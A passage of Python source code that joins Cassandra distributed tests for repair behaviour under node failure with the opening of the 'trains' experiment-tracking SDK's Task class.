* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1, using repair_opts
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
node1, node2, node3 = cluster.nodelist()
# Insert data, kill node 2, insert more data, restart node 2, insert another set of data
logger.debug("Inserting data...")
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30'])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K'])
node2.start(wait_for_binary_proto=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=40..60K'])
cluster.flush()
# Repair only the range node 1 owns
opts = repair_opts
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent."
assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair."
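# The streaming log line names the two endpoints that were out of sync; capture both
# addresses so we can verify exactly which nodes took part in the repair.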
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
_, matches = out_of_sync_logs[0]
out_of_sync_nodes = {matches.group(1), matches.group(2)}
valid_out_of_sync_pairs = [{node1.address(), node2.address()}]
assert out_of_sync_nodes in valid_out_of_sync_pairs, str(out_of_sync_nodes)
@since('2.2')
def test_trace_repair(self):
"""
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on to node1, setting job threads to 2 and with tracing enabled
* Check the trace data was written, and that the right job thread count was used
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
logger.debug("Inserting data...")
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30'])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K'])
node2.start(wait_for_binary_proto=True)
cluster.flush()
job_thread_count = '2'
opts = ['-tr', '-j', job_thread_count]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
time.sleep(5) # Give the trace table some time to populate
session = self.patient_cql_connection(node1)
rows = list(session.execute("SELECT activity FROM system_traces.events"))
# This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is
# the repair task triggered in the test.
assert 'job threads: {}'.format(job_thread_count) in rows[0][0], \
'Expected {} job threads in repair options. Instead we saw {}'.format(job_thread_count, rows[0][0])
@since('2.2')
def test_thread_count_repair(self):
"""
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on to node1, setting job threads
* Check the right job thread count was used
* Repeat steps 2 through 5 with all job count options
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
# Valid job thread counts: 1, 2, 3, and 4
for job_thread_count in range(1, 5):
logger.debug("Inserting data...")
node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate',
'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count - 1), 2 * job_thread_count)])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate',
'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count), 2 * (job_thread_count + 1))])
node2.start(wait_for_binary_proto=True)
cluster.flush()
session = self.patient_cql_connection(node1)
session.execute("TRUNCATE system_traces.events")
opts = ['-tr', '-j', str(job_thread_count)]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
time.sleep(5) # Give the trace table some time to populate
rows = list(session.execute("SELECT activity FROM system_traces.events"))
# This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is
# the repair task triggered in the test.
assert 'job threads: {}'.format(job_thread_count) in rows[0][0], \
'Expected {} job threads in repair options. Instead we saw {}'.format(job_thread_count, rows[0][0])
@pytest.mark.no_vnodes
def test_multiple_concurrent_repairs(self):
"""
@jira_ticket CASSANDRA-11451
Make sure we can run sub range repairs in parallel - and verify that we actually do repair
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=1M', 'no-warmup', '-schema', 'replication(factor=3)', '-rate', 'threads=30'])
node2.start(wait_for_binary_proto=True)
t1 = threading.Thread(target=node1.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node3.initial_token), str(node1.initial_token)),))
t2 = threading.Thread(target=node2.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node1.initial_token), str(node2.initial_token)),))
t3 = threading.Thread(target=node3.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node2.initial_token), str(node3.initial_token)),))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
node1.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
_, _, rc = node2.stress(['read', 'n=1M', 'no-warmup', '-rate', 'threads=30'], whitelist=True)
assert rc == 0
@since('4.0')
def test_wide_row_repair(self):
"""
@jira_ticket CASSANDRA-13899
Make sure compressed vs uncompressed blocks are handled correctly when stream decompressing
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
node2.stop(wait_other_notice=True)
profile_path = os.path.join(os.getcwd(), 'stress_profiles/repair_wide_rows.yaml')
logger.info(("yaml = " + profile_path))
node1.stress(['user', 'profile=' + profile_path, 'n=50', 'ops(insert=1)', 'no-warmup', '-rate', 'threads=8',
'-insert', 'visits=FIXED(100K)', 'revisit=FIXED(100K)'])
node2.start(wait_for_binary_proto=True)
node2.repair()
@since('2.1', max_version='4')
def test_dead_coordinator(self):
"""
@jira_ticket CASSANDRA-11824
Make sure parent repair session is cleared out if the repair coordinator dies
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
node1.stress(['write', 'n=100k', '-schema', 'replication(factor=3)', '-rate', 'threads=30'])
def run_repair():
try:
if cluster.version() >= "2.2":
node1.repair()
else:
node1.nodetool('repair keyspace1 standard1 -inc -par')
except ToolError:
logger.debug("got expected exception during repair, ignoring")
t1 = threading.Thread(target=run_repair)
t1.start()
if cluster.version() > "2.2":
node2.watch_log_for('Validating ValidationRequest', filename='debug.log')
else:
node1.watch_log_for('requesting merkle trees', filename='system.log')
time.sleep(2)
logger.debug("stopping node1")
node1.stop(gently=False, wait_other_notice=True)
t1.join()
logger.debug("starting node1 - first repair should have failed")
node1.start(wait_for_binary_proto=True)
logger.debug("running second repair")
if cluster.version() >= "2.2":
node1.repair()
else:
node1.nodetool('repair keyspace1 standard1 -inc -par')
@since('2.2')
def test_dead_sync_initiator(self):
"""
@jira_ticket CASSANDRA-12901
"""
self._test_failure_during_repair(phase='sync', initiator=True)
@since('2.2')
def test_dead_sync_participant(self):
"""
@jira_ticket CASSANDRA-12901
"""
self._test_failure_during_repair(phase='sync', initiator=False,)
@since('2.2', max_version='4')
def test_failure_during_anticompaction(self):
"""
@jira_ticket CASSANDRA-12901
"""
self._test_failure_during_repair(phase='anticompaction',)
@since('2.2')
def test_failure_during_validation(self):
"""
@jira_ticket CASSANDRA-12901
"""
self._test_failure_during_repair(phase='validation')
def _test_failure_during_repair(self, phase, initiator=False):
cluster = self.cluster
# We are not interested in specific errors, but
# that the repair session finishes on node failure without hanging
self.fixture_dtest_setup.ignore_log_patterns = [
"Endpoint .* died",
"Streaming error occurred",
"StreamReceiveTask",
"Stream failed",
"Session completed with the following error",
"Repair session .* for range .* failed with error",
"Sync failed between .* and .*",
"failed to send a stream message/file to peer",
"failed to send a stream message/data to peer"
]
# stream session will be closed upon EOF, see CASSANDRA-15666
if cluster.version() >= '4.0':
self.ignore_log_patterns.append("Socket closed before session completion")
self.ignore_log_patterns.append("is finished with state FAILED")
self.ignore_log_patterns.append("stream has been closed")
self.ignore_log_patterns.append("stream operation from .* failed")
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test (this must be after the populate)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Setting up cluster..")
cluster.populate(3)
node1, node2, node3 = cluster.nodelist()
node_to_kill = node2 if (phase == 'sync' and initiator) else node3
logger.debug("Setting up byteman on {}".format(node_to_kill.name))
# set up byteman
node_to_kill.byteman_port = '8100'
node_to_kill.import_config_files()
logger.debug("Starting cluster..")
cluster.start(jvm_args=['-Djdk.attach.allowAttachSelf=true'])
# cluster.start()
logger.debug("stopping node3")
node3.stop(gently=False, wait_other_notice=True)
self.patient_exclusive_cql_connection(node1)
logger.debug("inserting data while node3 is down")
node1.stress(stress_options=['write', 'n=1k',
'no-warmup', 'cl=ONE',
'-schema', 'replication(factor=3)',
'-rate', 'threads=10'])
logger.debug("bring back node3")
node3.start(wait_for_binary_proto=True)
if phase == 'sync':
script = 'stream_sleep.btm'
else:
script = 'repair_{}_sleep.btm'.format(phase)
if phase == 'validation':
prefix = '4.0' if cluster.version() >= '4.0' else 'pre4.0'
script = prefix + '/' + script
logger.debug("Submitting byteman script to {}".format(node_to_kill.name))
# Sleep on anticompaction/stream so there will be time for node to be killed
node_to_kill.byteman_submit([mk_bman_path(script)])
def node1_repair():
global nodetool_error
try:
node1.nodetool('repair keyspace1 standard1')
except Exception as e:
nodetool_error = e
logger.debug("repair node1")
# Launch in a external thread so it does not hang process
t = Thread(target=node1_repair)
t.start()
logger.debug("Will kill {} in middle of {}".format(node_to_kill.name, phase))
msg_to_wait = 'streaming plan for Repair'
if phase == 'anticompaction':
msg_to_wait = 'Got anticompaction request'
elif phase == 'validation':
msg_to_wait = 'Validating'
node_to_kill.watch_log_for(msg_to_wait, filename='debug.log')
node_to_kill.stop(gently=False, wait_other_notice=True)
logger.debug("Killed {}, now waiting repair to finish".format(node_to_kill.name))
t.join(timeout=60)
assert not t.is_alive(), 'Repair still running after sync {} was killed'\
.format("initiator" if initiator else "participant")
if cluster.version() < '4.0' or phase != 'sync':
# the log entry we're watching for in the sync task came from the
# anti compaction at the end of the repair, which has been removed in 4.0
node1.watch_log_for('Endpoint .* died', timeout=60)
node1.watch_log_for('Repair command .* finished', timeout=60)
RepairTableContents = namedtuple('RepairTableContents',
['parent_repair_history', 'repair_history'])
@since('2.2')
@pytest.mark.resource_intensive
class TestRepairDataSystemTable(Tester):
"""
@jira_ticket CASSANDRA-5839
Tests the `system_distributed.parent_repair_history` and
`system_distributed.repair_history` tables by writing thousands of records
to a cluster, then ensuring these tables are in valid states before and
after running repair.
"""
@pytest.fixture(scope='function', autouse=True)
def fixture_set_cluster_settings(self, fixture_dtest_setup):
"""
Prepares a cluster for tests of the repair history tables by starting
a 5-node cluster, then inserting 5000 values with RF=3.
"""
self.cluster = fixture_dtest_setup.cluster
self.cluster.populate(5).start()
self.node1 = self.cluster.nodelist()[0]
self.session = fixture_dtest_setup.patient_cql_connection(self.node1)
self.node1.stress(stress_options=['write', 'n=5K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)'])
fixture_dtest_setup.cluster.flush()
def repair_table_contents(self, node, include_system_keyspaces=True):
"""
@param node the node to connect to and query
@param include_system_keyspaces if truthy, return repair information about all keyspaces. If falsey, filter out keyspaces whose name contains 'system'
Return a `RepairTableContents` `namedtuple` containing the rows in
`node`'s `system_distributed.parent_repair_history` and
`system_distributed.repair_history` tables. If `include_system_keyspaces`,
include all results. If not `include_system_keyspaces`, filter out
repair information about system keyspaces, or at least keyspaces with
'system' in their names.
"""
session = self.patient_cql_connection(node)
def execute_with_all(stmt):
return session.execute(SimpleStatement(stmt, consistency_level=ConsistencyLevel.ALL))
parent_repair_history = execute_with_all('SELECT * FROM system_distributed.parent_repair_history;')
repair_history = execute_with_all('SELECT * FROM system_distributed.repair_history;')
if not include_system_keyspaces:
parent_repair_history = [row for row in parent_repair_history
if 'system' not in row.keyspace_name]
repair_history = [row for row in repair_history if
'system' not in row.keyspace_name]
return RepairTableContents(parent_repair_history=parent_repair_history,
repair_history=repair_history)
@pytest.mark.skip(reason='hangs CI')
def test_initial_empty_repair_tables(self):
logger.debug('repair tables:')
logger.debug(self.repair_table_contents(node=self.node1, include_system_keyspaces=False))
repair_tables_dict = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)._asdict()
for table_name, table_contents in list(repair_tables_dict.items()):
assert not table_contents, '{} is non-empty'.format(table_name)
def test_repair_parent_table(self):
"""
Test that `system_distributed.parent_repair_history` is properly populated
after repair by:
- running repair on `node` and
- checking that there are a non-zero number of entries in `parent_repair_history`.
"""
self.node1.repair()
parent_repair_history, _ = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)
assert len(parent_repair_history)
def test_repair_table(self):
"""
Test that `system_distributed.repair_history` is properly populated
after repair by:
- running repair on `node` and
- checking that there are a non-zero number of entries in `repair_history`.
"""
self.node1.repair()
_, repair_history = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)
assert len(repair_history)
task.py
import atexit
import os
import signal
import sys
import threading
import time
from argparse import ArgumentParser
from tempfile import mkstemp
try:
from collections.abc import Callable, Sequence as CollectionsSequence
except ImportError:
from collections import Callable, Sequence as CollectionsSequence
from typing import Optional, Union, Mapping, Sequence, Any, Dict, List
import psutil
import six
from pathlib2 import Path
from .backend_api.services import tasks, projects, queues
from .backend_api.session.session import Session, ENV_ACCESS_KEY, ENV_SECRET_KEY
from .backend_interface.metrics import Metrics
from .backend_interface.model import Model as BackendModel
from .backend_interface.task import Task as _Task
from .backend_interface.task.args import _Arguments
from .backend_interface.task.development.worker import DevWorker
from .backend_interface.task.repo import ScriptInfo
from .backend_interface.util import get_single_result, exact_match_regex, make_message
from .binding.absl_bind import PatchAbsl
from .binding.artifacts import Artifacts, Artifact
from .binding.environ_bind import EnvironmentBind, PatchOsFork
from .binding.frameworks.pytorch_bind import PatchPyTorchModelIO
from .binding.frameworks.tensorflow_bind import TensorflowBinding
from .binding.frameworks.xgboost_bind import PatchXGBoostModelIO
from .binding.joblib_bind import PatchedJoblib
from .binding.matplotlib_bind import PatchedMatplotlib
from .config import config, DEV_TASK_NO_REUSE, get_is_master_node
from .config import running_remotely, get_remote_task_id
from .config.cache import SessionCache
from .debugging.log import LoggerRoot
from .errors import UsageError
from .logger import Logger
from .model import Model, InputModel, OutputModel, ARCHIVED_TAG
from .task_parameters import TaskParameters
from .utilities.args import argparser_parseargs_called, get_argparser_last_args, \
argparser_update_currenttask
from .utilities.dicts import ReadOnlyDict
from .utilities.proxy_object import ProxyDictPreWrite, ProxyDictPostWrite, flatten_dictionary, \
nested_from_flat_dictionary, naive_nested_from_flat_dictionary
from .utilities.resource_monitor import ResourceMonitor
from .utilities.seed import make_deterministic
class Task(_Task):
"""
Task (experiment) object represents the current running experiment and connects all the different parts into \
a fully reproducible experiment
Common usage is calling :func:`Task.init` to initialize the main task.
The main task is development / remote execution mode-aware, and supports connecting various SDK objects
such as Models etc. In development mode, the main task supports task reuse (see :func:`Task.init` for more
information on development mode features).
Any subsequent call to :func:`Task.init` will return the already-initialized main task
and will not create a new main task.
Sub-tasks, meaning tasks which are not the main task and are not development / remote execution mode aware, can be
created using :func:`Task.create`. These tasks do not support task reuse and any call
to :func:`Task.create` will always create a new task.
You can also query existing tasks in the system by calling :func:`Task.get_task`.
**Usage:** :func:`Task.init` or :func:`Task.get_task`
"""
TaskTypes = _Task.TaskTypes
NotSet = object()
__create_protection = object()
__main_task = None # type: Task
__exit_hook = None
__forked_proc_main_pid = None
__task_id_reuse_time_window_in_hours = float(config.get('development.task_reuse_time_window_in_hours', 24.0))
__detect_repo_async = config.get('development.vcs_repo_detect_async', False)
__default_output_uri = config.get('development.default_output_uri', None)
class _ConnectedParametersType(object):
argparse = "argument_parser"
dictionary = "dictionary"
task_parameters = "task_parameters"
@classmethod
def _options(cls):
return {
var for var, val in vars(cls).items()
if isinstance(val, six.string_types)
}
def __init__(self, private=None, **kwargs):
"""
.. warning::
Do not construct Task manually!
**Please use Task.init() or Task.get_task(id=, project=, name=)**
"""
if private is not Task.__create_protection:
raise UsageError(
'Task object cannot be instantiated externally, use Task.current_task() or Task.get_task(...)')
self._repo_detect_lock = threading.RLock()
super(Task, self).__init__(**kwargs)
self._arguments = _Arguments(self)
self._logger = None
self._last_input_model_id = None
self._connected_output_model = None
self._dev_worker = None
self._connected_parameter_type = None
self._detect_repo_async_thread = None
self._resource_monitor = None
self._artifacts_manager = Artifacts(self)
# register atexit, so that we mark the task as stopped
self._at_exit_called = False
@classmethod
def current_task(cls):
# type: () -> Task
"""
Return the Current Task object for the main execution task (task context).
:return: Task() object or None
"""
return cls.__main_task
@classmethod
def init(
cls,
project_name=None,
task_name=None,
task_type=TaskTypes.training,
reuse_last_task_id=True,
output_uri=None,
auto_connect_arg_parser=True,
auto_connect_frameworks=True,
auto_resource_monitoring=True,
):
# type: (Optional[str], Optional[str], TaskTypes, bool, Optional[str], bool, Union[bool, Mapping[str, bool]], bool) -> Task
"""
Return the Task object for the main execution task (task context).
:param project_name: project to create the task in (if project doesn't exist, it will be created)
:param task_name: task name to be created (in development mode, not when running remotely)
:param task_type: task type to be created, Default: TaskTypes.training
Options are: 'training' (or 'train'), 'testing', 'inference'
:param reuse_last_task_id: start with the previously used task id (stored in the data cache folder).
If False, a new task with the same name is created every time the function is called.
Notice! The reused task will be reset. (when running remotely, the usual behaviour applies)
If reuse_last_task_id is of type string, it will assume this is the task_id to reuse!
Note: A closed or published task will not be reused, and a new task will be created.
:param output_uri: Default location for output models (currently supports local folder/S3/GS/Azure).
Notice: a sub-folder named after the task_id is created in the destination folder for all outputs.
Usage example: /mnt/share/folder, s3://bucket/folder , gs://bucket-name/folder,
azure://company.blob.core.windows.net/folder/
Note: When using cloud storage, make sure you install the accompanying packages.
For example: trains[s3], trains[gs], trains[azure]
:param auto_connect_arg_parser: Automatically grab the ArgParser and connect it with the task.
if set to false, you can manually connect the ArgParser with task.connect(parser)
:param auto_connect_frameworks: If True, automatically patch Matplotlib, XGBoost, scikit-learn,
Keras callbacks, and TensorBoard/X to serialize plots, graphs and model locations to the trains backend
(in addition to original output destination).
Fine grained control is possible by passing a dictionary instead of a Boolean.
Missing keys are considered True; an empty dictionary is considered False. Full example:
auto_connect_frameworks={'matplotlib': True, 'tensorflow': True, 'pytorch': True,
'xgboost': True, 'scikit': True, 'detect_repository': True}
:param auto_resource_monitoring: If True, machine vitals will be sent alongside the task scalars.
Resource graphs will appear under the title ':resource monitor:' in the scalars tab.
:return: Task() object
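Usage sketch (illustrative only; the project and task names below are placeholders):
from trains import Task
task = Task.init(project_name='examples', task_name='my experiment')
task.connect({'batch_size': 32, 'epochs': 10})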
"""
def verify_defaults_match():
validate = [
('project name', project_name, cls.__main_task.get_project_name()),
('task name', task_name, cls.__main_task.name),
('task type', str(task_type), str(cls.__main_task.task_type)),
]
for field, default, current in validate:
if default is not None and default != current:
raise UsageError(
"Current task already created "
"and requested {field} '{default}' does not match current {field} '{current}'. "
"If you wish to create additional tasks use `Task.create`".format(
field=field,
default=default,
current=current,
)
)
if cls.__main_task is not None:
# if this is a subprocess, regardless of what the init was called for,
# we have to fix the main task hooks and stdout bindings
if cls.__forked_proc_main_pid != os.getpid() and cls.__is_subprocess():
if task_type is None:
task_type = cls.__main_task.task_type
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure we do not wait for the repo detect thread
cls.__main_task._detect_repo_async_thread = None
cls.__main_task._dev_worker = None
cls.__main_task._resource_monitor = None
# remove the logger from the previous process
logger = cls.__main_task.get_logger()
logger.set_flush_period(None)
# create a new logger (to catch stdout/err)
cls.__main_task._logger = None
cls.__main_task._reporter = None
cls.__main_task.get_logger()
cls.__main_task._artifacts_manager = Artifacts(cls.__main_task)
# unregister signal hooks, they cause subprocess to hang
cls.__main_task.__register_at_exit(cls.__main_task._at_exit)
cls.__main_task.__register_at_exit(None, only_remove_signal_and_exception_hooks=True)
if not running_remotely():
verify_defaults_match()
return cls.__main_task
# check that we are not a child process, in that case do nothing.
# we should not get here unless this is Windows platform, all others support fork
if cls.__is_subprocess():
class _TaskStub(object):
def __call__(self, *args, **kwargs):
return self
def __getattr__(self, attr):
return self
def __setattr__(self, attr, val):
pass
is_sub_process_task_id = cls.__get_master_id_task_id()
# we could not find a task ID, revert to old stub behaviour
if not is_sub_process_task_id:
return _TaskStub()
elif running_remotely() and not get_is_master_node():
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure everyone understands we should act as if we are a subprocess (fake pid 1)
cls.__update_master_pid_task(pid=1, task=get_remote_task_id())
else:
# set us as master process (without task ID)
cls.__update_master_pid_task()
is_sub_process_task_id = None
if task_type is None:
# Backwards compatibility: if called from Task.current_task and task_type
# was not specified, keep legacy default value of TaskTypes.training
task_type = cls.TaskTypes.training
elif isinstance(task_type, six.string_types):
task_type_lookup = {'testing': cls.TaskTypes.testing, 'inference': cls.TaskTypes.testing,
'train': cls.TaskTypes.training, 'training': cls.TaskTypes.training,}
if task_type not in task_type_lookup:
raise ValueError("Task type '{}' not supported, options are: {}".format(task_type,
list(task_type_lookup.keys())))
task_type = task_type_lookup[task_type]
try:
if not running_remotely():
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls._create_dev_task(
project_name,
task_name,
task_type,
reuse_last_task_id,
detect_repo=False if (isinstance(auto_connect_frameworks, dict) and
not auto_connect_frameworks.get('detect_repository', True)) else True
)
# set defaults
if output_uri:
task.output_uri = output_uri
elif cls.__default_output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
else:
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls(
private=cls.__create_protection,
task_id=get_remote_task_id(),
log_to_backend=False,
)
if cls.__default_output_uri and not task.output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
except Exception:
raise
else:
Task.__main_task = task
# register the main task for at exit hooks (there should only be one)
task.__register_at_exit(task._at_exit)
# patch OS forking
PatchOsFork.patch_fork()
if auto_connect_frameworks:
is_auto_connect_frameworks_bool = not isinstance(auto_connect_frameworks, dict)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('scikit', True):
PatchedJoblib.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('matplotlib', True):
PatchedMatplotlib.update_current_task(Task.__main_task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('tensorflow', True):
PatchAbsl.update_current_task(Task.__main_task)
TensorflowBinding.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('pytorch', True):
PatchPyTorchModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('xgboost', True):
PatchXGBoostModelIO.update_current_task(task)
if auto_resource_monitoring and not is_sub_process_task_id:
task._resource_monitor = ResourceMonitor(task)
task._resource_monitor.start()
# make sure all random generators are initialized with new seed
make_deterministic(task.get_random_seed())
if auto_connect_arg_parser:
EnvironmentBind.update_current_task(Task.__main_task)
# Patch ArgParser to be aware of the current task
argparser_update_currenttask(Task.__main_task)
# Check if parse args already called. If so, sync task parameters with parser
if argparser_parseargs_called():
parser, parsed_args = get_argparser_last_args()
task._connect_argparse(parser=parser, parsed_args=parsed_args)
elif argparser_parseargs_called():
# parse_args was automatically patched, but auto_connect_arg_parser is False...
raise UsageError("ArgumentParser.parse_args() was automatically connected to this task, "
"although auto_connect_arg_parser is turned off!\n"
"When turning off auto_connect_arg_parser, call Task.init(...) "
"before calling ArgumentParser.parse_args()")
# Make sure we start the logger, it will patch the main logging object and pipe all output
# if we are running locally and using development mode worker, we will pipe all stdout to logger.
# The logger will automatically take care of all patching (we just need to make sure to initialize it)
logger = task.get_logger()
# show the debug metrics page in the log, it is very convenient
if not is_sub_process_task_id:
logger.report_text(
'TRAINS results page: {}/projects/{}/experiments/{}/output/log'.format(
task._get_app_server(),
task.project if task.project is not None else '*',
task.id,
),
)
# Make sure we start the dev worker if required, otherwise it will only be started when we write
# something to the log.
task._dev_mode_task_start()
return task
@classmethod
def create(
cls,
project_name=None,
task_name=None,
task_type=TaskTypes.training,
):
# type: (Optional[str], Optional[str], TaskTypes) -> Task
"""
Create a new Task object, regardless of the main execution task (Task.init).
Notice: This function will always create a new task, whether running in development or remote execution mode.
:param project_name: Project to create the task in.
If project is None, and the main execution task is initialized (Task.init), its project will be used.
If project is provided but doesn't exist, it will be created.
:param task_name: task name to be created
:param task_type: Task type to be created. (default: "training")
Optional Task types are: "training" / "testing" / "dataset_import" / "annotation" / "annotation_manual"
:return: Task() object
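Usage sketch (illustrative names):
task = Task.create(project_name='examples', task_name='offline task', task_type=Task.TaskTypes.testing)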
"""
if not project_name:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
try:
task = cls(
private=cls.__create_protection,
project_name=project_name,
task_name=task_name,
task_type=task_type,
log_to_backend=False,
force_create=True,
)
except Exception:
raise
return task
@classmethod
def get_task(cls, task_id=None, project_name=None, task_name=None):
# type: (Optional[str], Optional[str], Optional[str]) -> Task
"""
Returns a Task object based on either task_id (system UUID) or project name + task name
:param str task_id: unique task id string (if exists other parameters are ignored)
:param str project_name: project name (str) the task belongs to
:param str task_name: task name (str) within the selected project
:return: Task object
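Usage sketch (illustrative; assumes such a task exists on the server):
task = Task.get_task(project_name='examples', task_name='my experiment')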
"""
return cls.__get_task(task_id=task_id, project_name=project_name, task_name=task_name)
@classmethod
def get_tasks(cls, task_ids=None, project_name=None, task_name=None, task_filter=None):
# type: (Optional[Sequence[str]], Optional[str], Optional[str], Optional[Dict]) -> Sequence[Task]
"""
Returns a list of Task objects, matching requested task name (or partially matching)
:param list(str) task_ids: list of unique task id string (if exists other parameters are ignored)
:param str project_name: project name (str) the task belongs to (use None for all projects)
:param str task_name: task name (str) within the selected project
Returns any partial match of task_name; regular expression matching is also supported
If None is passed, returns all tasks within the project
:param dict task_filter: filter and order Tasks. See service.tasks.GetAllRequest for details
:return: list of Task object
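Usage sketch (illustrative; the task_name pattern is a placeholder):
tasks = Task.get_tasks(project_name='examples', task_name='experiment.*')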
"""
return cls.__get_tasks(task_ids=task_ids, project_name=project_name, task_name=task_name, **(task_filter or {}))
@property
def output_uri(self):
# type: () -> str
return self.storage_uri
@output_uri.setter
def output_uri(self, value):
# type: (str) -> None
# check if we have the correct packages / configuration
if value and value != self.storage_uri:
from .storage.helper import StorageHelper
helper = StorageHelper.get(value)
if not helper:
raise ValueError("Could not get access credentials for '{}' "
", check configuration file ~/trains.conf".format(value))
helper.check_write_permissions(value)
self.storage_uri = value
@property
def artifacts(self):
# type: () -> Dict[str, Artifact]
"""
Read-only dictionary of Task artifacts (name, artifact)
:return dict: dictionary of artifacts
"""
if not Session.check_min_api_version('2.3'):
return ReadOnlyDict()
artifacts_pairs = []
if self.data.execution and self.data.execution.artifacts:
artifacts_pairs = [(a.key, Artifact(a)) for a in self.data.execution.artifacts]
if self._artifacts_manager:
artifacts_pairs += list(self._artifacts_manager.registered_artifacts.items())
return ReadOnlyDict(artifacts_pairs)
@property
def models(self):
# type: () -> Dict[str, List[Model]]
"""
Read-only dictionary of the Task's loaded/stored models
:return: dictionary of models loaded/stored {'input': list(Model), 'output': list(Model)}
"""
return self.get_models()
@classmethod
def clone(cls, source_task=None, name=None, comment=None, parent=None, project=None):
# type: (Optional[Task], Optional[str], Optional[str], Optional[str], Optional[str]) -> Task
"""
Clone a task object, creating a copy of the task.
:param source_task: Source Task object (or ID) to be cloned
:type source_task: Task/str
:param str name: Optional, new name for the new task
:param str comment: Optional, comment for the new task
:param str parent: Optional parent Task ID of the new task.
If None, parent will be set to source_task.parent, or if not available to source_task itself.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:return: a new cloned Task object
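Usage sketch (illustrative; the source task id is a placeholder):
cloned = Task.clone(source_task='<source-task-id>', name='cloned copy')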
"""
assert isinstance(source_task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, upgrade trains-server to 0.12.0 or above")
task_id = source_task if isinstance(source_task, six.string_types) else source_task.id
if not parent:
if isinstance(source_task, six.string_types):
source_task = cls.get_task(task_id=source_task)
parent = source_task.id if not source_task.parent else source_task.parent
elif isinstance(parent, Task):
parent = parent.id
cloned_task_id = cls._clone_task(cloned_task_id=task_id, name=name, comment=comment,
parent=parent, project=project)
cloned_task = cls.get_task(task_id=cloned_task_id)
return cloned_task
@classmethod
def enqueue(cls, task, queue_name=None, queue_id=None):
# type: (Task, Optional[str], Optional[str]) -> Any
"""
